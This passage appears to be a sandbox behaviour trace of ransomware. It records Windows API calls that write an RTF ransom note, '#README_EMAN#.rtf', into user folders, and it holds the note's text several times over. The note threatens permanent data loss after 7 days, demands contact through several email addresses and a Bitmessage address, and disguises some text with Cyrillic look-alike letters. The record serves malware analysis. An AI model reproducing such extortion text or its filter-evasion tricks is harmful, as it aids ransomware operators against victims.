which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.224] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.225] CloseHandle (hObject=0x2ec) returned 1 [0291.225] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\#readme_eman#.rtf")) returned 0xffffffff [0291.225] GetLastError () returned 0x2 [0291.225] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0292.052] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.052] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 